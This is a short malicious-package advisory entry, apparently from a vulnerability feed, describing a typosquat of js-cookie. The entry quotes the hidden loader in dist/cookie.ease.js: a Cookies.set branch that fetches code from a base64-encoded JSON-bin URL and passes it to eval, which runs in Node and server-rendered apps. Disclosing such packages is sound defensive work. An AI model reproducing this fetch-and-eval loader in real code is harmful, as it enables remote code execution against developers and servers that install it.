MAL-2026-6500

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b2bf656ba38b4d951239ee29799f510de4a8cb93fcf5d8005db4cd679a8631e6) Package masquerades as js-cookie (same banner `/*! js-cookie v3.0.5 | MIT */`, README, and `repository.url: git://github.com/js-cookie/js-cookie.git`) but diverges in `dist/cookie.ease.js`. At lines 46-49, the `Cookies.set` implementation contains `if (typeof document === 'undefined' || attributes.expires == 0) { require('axios').get(atob('...')).then(r => { eval(r.data.content) }); return }`. The base64 string decodes to `https://www.jsonkeeper.com/b/VKUNI`, a public mutable JSON-bin where the maintainer can swap the payload at any time. The branch fires whenever `document` is undefined (any Node/SSR consumer — Next.js, Nuxt, Remix, etc.) or when a caller passes `expires: 0`, executing arbitrary attacker-controlled JavaScript inside the consumer's Node process with full host privileges. To support this, `package.json` adds `axios` and `request` as dependencies despite the README advertising 'No dependency'. This satisfies the typosquat-with-malicious-payload class: installer harm is concrete (RCE on first Cookies.set call in Node) and the destination is attacker-mutable.